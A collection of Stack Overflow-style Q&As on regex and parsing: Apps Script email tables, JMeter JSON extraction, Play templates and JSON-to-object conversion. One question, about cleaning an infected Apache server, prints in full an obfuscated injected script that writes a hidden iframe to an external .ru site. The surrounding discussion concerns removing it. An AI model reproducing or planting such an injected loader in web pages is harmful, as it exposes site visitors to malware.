regex.exec not able to extract table from email body

I have an email body containing a table whose first (leftmost) column has the heading "Client Time".
I want to extract this whole table, but I get null with the following exec:
let regex = /<tr><td><b>Client Time([\S\s]+)<table/;
Logger.log(regex.exec(tempbody));
Here is the rest of the code, which should be fine:
let table;
if ((table = regex.exec(tempbody)) !== null) {
  const row_regex = /<tr>(.+)<\/tr>/g; // one match per table row
  let data, tempdata, rows, cell;
  while ((rows = row_regex.exec(table[1])) !== null) {
    data = [];
    const cell_regex = /<td.*?>(.+?)<\/td>/g; // one match per cell
    while ((cell = cell_regex.exec(rows[1])) !== null) {
      data.push(cell[1]);
    }
    // only append rows with the same number of cells as the previous row
    if (!tempdata || tempdata.length === data.length) {
      sheet.appendRow(data);
    }
    tempdata = data;
  }
  inProcessLabel.removeFromThread(threads[i]);
}
What change do I need to make to the regex? Sorry, I don't understand regular expressions well, but I believe this same code worked for me in the past.

Using regular expressions to parse HTML is not a good idea: attributes, whitespace, line breaks and nesting can all vary in ways a fixed pattern does not anticipate.
Apps Script now runs on the V8 runtime, so you can simply add a proper HTML/XML parser library (written in pure JavaScript with minimal dependencies) to your project. Just get the library source in full or minified form and add it as its own script file.
Here are a few good options:
XPath (source: full | minified)
HTMLParser2-20KB (source: minified)
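If adding a library is not an option, possible reasons the original pattern returns null include attributes on the tags (for example <tr style="...">), whitespace or line breaks between tags, or no "<table" after the matched row. A more tolerant regex can cope with simple, machine-generated tables. This is a minimal sketch that assumes non-nested tables; extractClientTimeTable is a hypothetical helper, not part of Apps Script:

```javascript
// Hypothetical helper (not from the question): returns the cell text of the
// first <table> that mentions "Client Time", as an array of rows, or null.
// Assumes simple, non-nested tables such as machine-generated email reports.
function extractClientTimeTable(html) {
  // [\s\S] matches any character including newlines; \b[^>]* allows attributes.
  const tableRe = /<table\b[^>]*>([\s\S]*?)<\/table>/gi;
  let table;
  while ((table = tableRe.exec(html)) !== null) {
    if (!/Client Time/.test(table[1])) continue; // not the table we want
    const rows = [];
    const rowRe = /<tr\b[^>]*>([\s\S]*?)<\/tr>/gi;
    let row;
    while ((row = rowRe.exec(table[1])) !== null) {
      const cells = [];
      const cellRe = /<t[dh]\b[^>]*>([\s\S]*?)<\/t[dh]>/gi;
      let cell;
      while ((cell = cellRe.exec(row[1])) !== null) {
        // Drop inner tags such as <b>, then collapse whitespace.
        cells.push(cell[1].replace(/<[^>]*>/g, "").replace(/\s+/g, " ").trim());
      }
      rows.push(cells);
    }
    return rows;
  }
  return null;
}
```

In Apps Script you would pass it the HTML from message.getBody() and append each returned row with sheet.appendRow(row).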

Related

Parsing email with Google Apps Script, regex issue?

I used to be quite proficient in VBA with Excel, but I'm currently trying to do something with Google Apps Script and I am well and truly stuck.
Basically, I am trying to extract data from a standardised email in Gmail into a Google Sheet. There are a couple of other threads on the subject which I have consulted so far, and I can get the body of the email into the sheet but cannot parse it.
I am new to regex, but my pattern tests OK on regex101.
I am also brand new to Google Apps Script, and even the debugger seems to have stopped working now (it worked before, so I would be grateful if anyone can suggest why).
Here is my basic function:
function processInboxToSheet() {
var label = GmailApp.getUserLabelByName("NEWNOPS");
var threads = label.getThreads();
// Set destination sheet
var sheet = SpreadsheetApp.getActiveSheet();
// Get all emails labelled NEWNOPS
for (var i = 0; i < threads.length; i++) {
var tmp,
message = threads[i].getMessages()[1], // second message in thread
content = message.getPlainBody(); // remove html markup
if (content) {
// search email for 'of:' and capture next line of text as address
// tests OK at regex101.com
property = content.match(/of:[\n]([^\r\n]*)[\r\n]/);
// if no match, display error
var property = (tmp && tmp[1]) ? tmp[1].trim() : 'No property';
sheet.appendRow([property]);
} // End if
// remove label to avoid duplication
threads[i].removeLabel(label)
} // End for loop
}
I can append 'content' to the sheet OK, but I cannot extract the address text with the regex. The content displays as follows:
NOPS for the purchase of:
123 Any Street, Anytown, AN1 1AN
DATE: 05/05/2017
PRICE: £241,000
Seller’s Details
NAME: Mrs Seller
Thanks for reading :)
The return value of .match() is an array (or null when there is no match). The first captured group, containing the address, will be at index 1.
Based on the following line after your call to .match(), it looks like the tmp variable should have been assigned that array, not the property variable.
var property = (tmp && tmp[1]) ? tmp[1].trim() : 'No property';
That line says, if .match() returned something that isn't null and has a value at index 1, then trim that value and assign to property, otherwise assign it the string 'No property'.
So, try changing this line:
property = content.match(/of:[\n]([^\r\n]*)[\r\n]/);
To this:
tmp = content.match(/of:[\n]([^\r\n]*)[\r\n]/);
Thanks Kevin, I think I must have changed it while debugging.
The problem was with my regexp in the end. After a bit of trial and error the following worked:
tmp = content.match(/of:[\r\n]+([^\r\n]+)/);
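A likely reason the first pattern failed is that the plain-text body uses "\r\n" line endings (an assumption, but one consistent with the fix working): [\n] then sees "\r" immediately after "of:". A minimal JavaScript sketch (it should also run in Apps Script's V8 runtime) comparing both patterns; extractProperty is a hypothetical name and the sample body is assumed:

```javascript
// Hypothetical helper wrapping the pattern that finally worked: skip one or
// more line-break characters after "of:", then capture the rest of that line.
function extractProperty(content) {
  const tmp = content.match(/of:[\r\n]+([^\r\n]+)/);
  return (tmp && tmp[1]) ? tmp[1].trim() : "No property";
}

// Assumed sample body with Windows-style "\r\n" line endings.
const body = "NOPS for the purchase of:\r\n123 Any Street, Anytown, AN1 1AN\r\nDATE: 05/05/2017\r\n";

// The earlier pattern expects "\n" right after "of:", but finds "\r" first.
console.log(body.match(/of:[\n]([^\r\n]*)[\r\n]/)); // null
console.log(extractProperty(body)); // 123 Any Street, Anytown, AN1 1AN
```

Using [\r\n]+ also tolerates plain "\n" endings and blank lines between "of:" and the address.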

sed multiline replace HTML with javascript malicious code

I have an Apache server that has been infected with pieces of malicious JavaScript code that infect the computers visiting the web page.
What I'm trying to do is remove these pieces of malicious code using the find and sed commands on a Linux server.
I have created a regular expression for sed that matches almost everything except the "</script>" end tag. That tag is on a new line, and I can't find a way to match it as well.
The malicious code is:
<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+Stri
ng.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }
</script>
Note from the writer: after posting the question, I noticed that the web formatting cuts off the previous sample. To see the full sample of malicious JavaScript code, look at the non-bold text in the next block and append a newline and a "</script>" HTML tag at the end.
The sed command that works for all the text except the final "</script>" is:
**find /root/cambios -type f -exec sed -i 's#**<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String
.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }**##g' {} \;**
So, can anyone help me match the newline and the "</script>" text?
Thank you in advance.
Indeed, you shouldn't use regex for this task. As has been said many times on SO, regular expressions are not the proper tool for manipulating HTML, because HTML is not a regular language. Your best bet is to use an HTML parser. For instance, the following unoptimized (but still simple) code uses Jsoup to achieve your goal:
import org.jsoup.Jsoup;
import org.jsoup.nodes.DataNode;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.nodes.Node;
import org.jsoup.select.Elements;

public class RemoveScript {
    public static void main(String[] args) {
        // Replace with the exact body of the injected <script> block
        String viralContent = "Your viral content";
        String inputText = "<html><head><script>" + viralContent + "</script></head><body></body></html>";
        Document doc = Jsoup.parse(inputText);
        Elements scripts = doc.select("script");
        for (Element element : scripts) {
            // A script's body is stored as a DataNode child, not as text
            for (Node child : element.childNodes()) {
                if (child instanceof DataNode) {
                    String content = ((DataNode) child).getWholeData();
                    if (content.equals(viralContent)) {
                        element.remove(); // detach the whole <script> element
                        break;
                    }
                }
            }
        }
        System.out.println(doc.toString());
    }
}
I'm sure other parsers can do the same very easily too.
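The parser route is the robust fix. For the narrower question of how a pattern can span the newline before </script>: sed processes its input one line at a time by default, which is why the newline is hard to reach there. In a regex engine that sees the whole file at once, [\s\S]*? (any character, including newlines, as few as possible) does the job. A minimal JavaScript sketch, assuming every injected block starts with exactly the prefix <script>if (i5463 == null) seen in the sample; stripInjectedScript is a hypothetical name:

```javascript
// Matches one injected block: the literal opening taken from the sample above,
// then any characters (including the newline) up to the first </script>.
// "." would stop at "\n", so [\s\S]*? is used instead; the trailing \s*
// also removes the line break that follows the closing tag.
const INJECTED_SCRIPT = /<script>if \(i5463 == null\)[\s\S]*?<\/script>\s*/g;

function stripInjectedScript(html) {
  // replace() with a global regex removes every injected block in the file.
  return html.replace(INJECTED_SCRIPT, "");
}
```

Scripts that do not start with that prefix are left untouched.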

PlayFramework 2.0 - Not able to call functions from other templates

I want to place some helper functions in another file, since they will be reused a lot. I took the listing file from the computer-database sample:
https://github.com/playframework/Play20/blob/master/samples/scala/computer-database/app/views/list.scala.html
I created a new file, called "listing.scala.html" under the app/views package, and moved the @link function from the original file to it. This new file looks like this:
@(currentSortBy: String, currentOrder: String, currentFilter: String)
@****************************************
* Helper generating navigation links *
****************************************@
@link(newPage:Int, newSortBy:String) = @{
var sortBy = currentSortBy
var order = currentOrder
if(newSortBy != null) {
sortBy = newSortBy
if(currentSortBy == newSortBy) {
if(currentOrder == "asc") {
order = "desc"
} else {
order = "asc"
}
} else {
order = "asc"
}
}
// Generate the link
routes.Application.listPerfil(newPage, sortBy, order, currentFilter)
}
So, in my original file, I replaced the @link call with this one:
@title
And the problem is, when I try to compile I get this error:
value link is not a member of play.api.templates.Html
But according to the documentation (http://www.playframework.org/documentation/2.0.4/ScalaTemplateUseCases) it seems to be ok.
Any guess?
Play's templates aren't the best place for advanced conditions. You will most probably get more flexibility by processing them in a controller (or another method) that returns only the required link,
i.e.:
@title
In your case, the proposed link(...) function of the Application controller can also return a reverse route.
Keep in mind that including other templates is the best option for repeating blocks of HTML, but sometimes it is hard to get a specific string out of them (mainly because of untrimmed whitespace). As you can see, there is also a problem with calling nested functions. You could most probably generate the whole A tag in listing.scala.html, but using it that way isn't comfortable enough (IMHO).
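The sort-toggling rules in the link helper are plain logic with no template dependencies, which is what makes them easy to move into a controller method. As a language-neutral illustration only (JavaScript, not Scala; nextSort is a hypothetical name), the same rules look like this:

```javascript
// Mirrors the rules of the link helper:
// - no new column requested: keep the current column and order;
// - same column clicked again: flip asc <-> desc;
// - different column: sort by it, starting with "asc".
function nextSort(currentSortBy, currentOrder, newSortBy) {
  if (newSortBy == null) {
    return { sortBy: currentSortBy, order: currentOrder };
  }
  if (currentSortBy === newSortBy) {
    return { sortBy: newSortBy, order: currentOrder === "asc" ? "desc" : "asc" };
  }
  return { sortBy: newSortBy, order: "asc" };
}
```

The controller would then only need to pass the resulting sortBy and order to the reverse route.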

Pulling multiple values from JSON response using RegEx Extractor

I'm testing a web service that returns JSON responses and I'd like to pull multiple values from the response. A typical response would contain multiple values in a list. For example:
{
"name":"#favorites",
"description":"Collection of my favorite places",
"list_id":4894636,
}
A response would contain many sections like the above example.
What I'd like to do in JMeter is go through the JSON response and pull each section outlined above, so that I can tie each returned name and description together as one entry to iterate over.
What I've been able to do so far is return the name value with a Regular Expression Extractor ("name":"(.+?)") using the template $1$. I'd like to pull both name and description but can't seem to get it to work. I've tried the regex "name":"(.+?)","description":"(.+?)" with a template of $1$$2$ without any success.
Does anyone know how I might pull multiple values using regex in this example?
You can just add the (?s) flag to the regex so that . also matches line breaks.
E.g: (?s)"name":"(.+?)","description":"(.+?)"
It works for me on assertions.
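In Java regex syntax, (?s) is the DOTALL flag; JavaScript's equivalent is the s flag. A small sketch, assuming a response laid out with one field per line, shows what the flag changes and what it does not:

```javascript
// Sample response with one field per line (an assumption about the layout).
const response = '{\n "name":"#favorites",\n "description":"Collection of my favorite places",\n "list_id":4894636\n}';

// Without the s flag "." stops at "\n"; with it, "." also matches line breaks.
const withoutS = /name.*description/.test(response);
const withS = /name.*description/s.test(response);

// The literal separator between the two fields still needs \s* here,
// because the flag changes only what "." matches.
const pair = /"name":"(.+?)",\s*"description":"(.+?)"/s.exec(response);
console.log(withoutS, withS, pair[1], pair[2]);
```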
It may be worth using BeanShell scripting to process the JSON response.
So if you need to get ALL the "name/description" pairs from response (for each section) you can do the following:
1. extract all the "name/description" pairs from the response in a loop;
2. save the extracted pairs to a CSV file in a handy format;
3. read the saved pairs from the CSV file later, e.g. using a CSV Data Set Config in a loop.
JSON response processing can be implemented using BeanShell scripting (~ Java) + any JSON-processing library (e.g. json-rpc-1.0):
- either in a BeanShell Sampler or in a BeanShell PostProcessor;
- all the required BeanShell libs are currently provided in the default JMeter distribution;
- to use a JSON-processing library, place its jar into the JMETER_HOME/lib folder.
Schematically it will look like this:
in case of a BeanShell PostProcessor:
Thread Group
    . . .
    YOUR HTTP Request
        BeanShell PostProcessor    // added as child
    . . .
in case of a BeanShell Sampler:
Thread Group
    . . .
    YOUR HTTP Request
    BeanShell Sampler              // separate sampler, added after your HTTP Request
    . . .
In this case it makes no difference which one you use.
You can either put the code itself into the sampler body ("Script" field) or store it in an external file.
Sampler code:
import java.io.*;
import org.json.*;
import org.apache.jmeter.samplers.SampleResult;
String extractedList = "extracted.csv";
StringBuilder contents = new StringBuilder();
FileOutputStream fos = null;
try {
    // Result of the HTTP Request that ran before this element
    SampleResult result = ctx.getPreviousResult();
    String body = result.getResponseDataAsString();
    if (body.equals("")) {
        Failure = true;
        FailureMessage = "ERROR: Response is EMPTY.";
        throw new Exception("ERROR: Response is EMPTY.");
    }
    if ("200".equals(result.getResponseCode())) {
        JSONObject response = new JSONObject(body);
        if (response.has("items")) {
            JSONArray items = response.getJSONArray("items");
            // One CSV line per item: name,description,list_id
            for (int i = 0; i < items.length(); i++) {
                JSONObject item = items.getJSONObject(i);
                String name = item.getString("name");
                String description = item.getString("description");
                int list_id = item.getInt("list_id");
                if (i != 0) {
                    contents.append("\n");
                }
                contents.append(name).append(",").append(description).append(",").append(list_id);
                System.out.println("\t " + name + "\t\t" + description + "\t\t" + list_id);
            }
        }
        // Write the CSV into JMeter's working directory
        fos = new FileOutputStream(System.getProperty("user.dir") + File.separator + extractedList);
        fos.write(contents.toString().getBytes());
    } else {
        Failure = true;
        FailureMessage = "Failed to extract from JSON response.";
    }
}
catch (Exception ex) {
    IsSuccess = false;
    log.error(ex.getMessage());
    System.err.println(ex.getMessage());
}
catch (Throwable thex) {
    System.err.println(thex.getMessage());
}
finally {
    // Close the file even if parsing failed part-way
    if (fos != null) {
        fos.close();
    }
}
Here is also a set of links on this topic:
JSON in JMeter
Processing JSON Responses with JMeter and the BSF Post Processor
Update (08.2017):
JMeter now has a set of built-in components (merged from third-party projects) to handle JSON without scripting:
JSON Path Extractor (contributed from ATLANTBH jmeter-components project);
JSON Extractor (contributed from UBIK Load Pack since JMeter 3.0) - see answer below.
I am assuming that JMeter uses Java-based regular expressions... This could mean no named capturing groups. Apparently, Java7 now supports them, but that doesn't necessarily mean JMeter would. For JSON that looks like this:
{
"name":"#favorites",
"description":"Collection of my favorite places",
"list_id":4894636,
}
{
"name":"#AnotherThing",
"description":"Something to fill space",
"list_id":0048265,
}
{
"name":"#SomethingElse",
"description":"Something else as an example",
"list_id":9283641,
}
...this expression:
\{\s*"name":"((?:\\"|[^"])*)",\s*"description":"((?:\\"|[^"])*)",(?:\\}|[^}])*}
...should match 3 times, capturing the "name" value into the first capturing group, and the "description" into the second capturing group, similar to the following:
Group 1          Group 2
---------------  --------------------------------
#favorites       Collection of my favorite places
#AnotherThing    Something to fill space
#SomethingElse   Something else as an example
Importantly, this expression supports quote escaping in the value portion (and really in the identifier name portion as well), so that the JavaScript string I said, "What is your name?"! will be stored in JSON as I said, \"What is your name?\"! and still be matched correctly, with the escaped quotes kept inside the capture.
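The same expression can be tried outside JMeter. Here it is ported to a JavaScript regex literal (extractPairs is a hypothetical helper name) and applied with the g flag, so each object yields one name/description pair:

```javascript
// The expression from the answer above as a JavaScript regex literal.
// Group 1: name, group 2: description; (?:\\"|[^"])* also accepts \" escapes.
const PAIR_RE = /\{\s*"name":"((?:\\"|[^"])*)",\s*"description":"((?:\\"|[^"])*)",(?:\\}|[^}])*}/g;

function extractPairs(text) {
  const pairs = [];
  let m;
  PAIR_RE.lastIndex = 0; // the shared g-flag regex keeps state between calls
  while ((m = PAIR_RE.exec(text)) !== null) {
    pairs.push([m[1], m[2]]);
  }
  return pairs;
}
```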
Using the Ubik Load Pack plugin for JMeter, which has been donated to JMeter core and has been available as the JSON Extractor since version 3.0, you can do it this way with the following Test Plan:
namesExtractor_ULP_JSON_PostProcessor config:
descriptionExtractor_ULP_JSON_PostProcessor config:
Loop Controller to loop over results:
Counter config:
Debug Sampler showing how to use name and description in one iteration:
And here is what you get for the following JSON:
[{ "name":"#favorites", "description":"Collection of my favorite places", "list_id": 4894636 }, { "name":"#AnotherThing", "description":"Something to fill space", "list_id": 48265 }, { "name":"#SomethingElse", "description":"Something else as an example", "list_id":9283641 }]
Compared to the BeanShell solution:
It is more "standard approach"
It performs much better than Beanshell code
It is more readable
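The JSON Extractor route works because it reads the response as structured data instead of text. The equivalent idea in plain JavaScript, using JSON.parse on the sample array above (namesWithDescriptions is a hypothetical name, not a JMeter API), keeps each name tied to its own description, much as the Loop Controller and Counter in the test plan walk the extracted names and descriptions in step:

```javascript
// Parse the array and keep each name paired with its own description.
function namesWithDescriptions(jsonText) {
  return JSON.parse(jsonText).map(function (item) {
    return { name: item.name, description: item.description };
  });
}
```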

How do I use RegEx to insert into a JSON response?

I'm using JSON for a web application I'm developing. For various reasons, I need to create "objects" that are already defined in the client script, based on the JSON response of a service call. For this I would like to use a regular expression to insert the "new" statements into the JSON response.
function Customer(cust)
{
this.Name = null;
this.ReferencedBy = null;
this.Address = null;
if (cust != null)
{
this.Name = cust.Name;
this.ReferencedBy = cust.ReferencedBy;
this.Address = cust.Address;
}
}
The JSON response is returned by an ASP.NET AJAX Service and it contains a "__type" member that could be used to determine the object type and insert the "new" statement.
Sample JSON:
{"__type":"Customer", "ReferencedBy":{"__type":"Customer", "Name":"Rita"}, "Name":"Joseph", "Address":"123 {drive}"}
The resulting string would look like this:
new Customer({"ReferencedBy":new Customer({"Name":"Rita"}), "Name":"Joseph", "Address":"123 {drive}"})
This is what I have so far, but it doesn't work correctly with the ReferencedBy member.
match:
({"__type":"Customer",)(.*?})
replace:
new Customer({$2})
Hmm, why not try a simpler way to do it? E.g.:
var myJSON = {"__type":"Customer", "ReferencedBy":{"__type":"Customer", "Name":"Rita"}, "Name":"Joseph", "Address":"123 {drive}"};
Then check the type with myJSON.__type, and if it is "Customer":
new Customer({"ReferencedBy":new Customer({"Name":myJSON.ReferencedBy.Name}), "Name":myJSON.Name, "Address":myJSON.Address });
Because you already have a defined data structure, it is not necessary to use a regex to match patterns and extract data.
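If the goal is to turn every object carrying a "__type" member into an instance of the matching constructor, including nested ones like ReferencedBy, a JSON.parse reviver can do it without regex. This is a swapped-in technique, not part of the answer above; TYPES and parseTyped are hypothetical names. The reviver runs on the innermost values first, so ReferencedBy is already a Customer by the time its parent is converted, and braces inside strings such as "123 {drive}" cause no trouble:

```javascript
// Constructor from the question: copies known fields from a plain object.
function Customer(cust) {
  this.Name = null;
  this.ReferencedBy = null;
  this.Address = null;
  if (cust != null) {
    this.Name = cust.Name;
    this.ReferencedBy = cust.ReferencedBy;
    this.Address = cust.Address;
  }
}

// Hypothetical registry mapping "__type" values to constructors.
const TYPES = { Customer: Customer };

function parseTyped(jsonText) {
  return JSON.parse(jsonText, function (key, value) {
    if (value && typeof value === "object" &&
        typeof value.__type === "string" &&
        Object.prototype.hasOwnProperty.call(TYPES, value.__type)) {
      // Nested values were already revived, so ReferencedBy is a Customer here.
      return new TYPES[value.__type](value);
    }
    return value;
  });
}
```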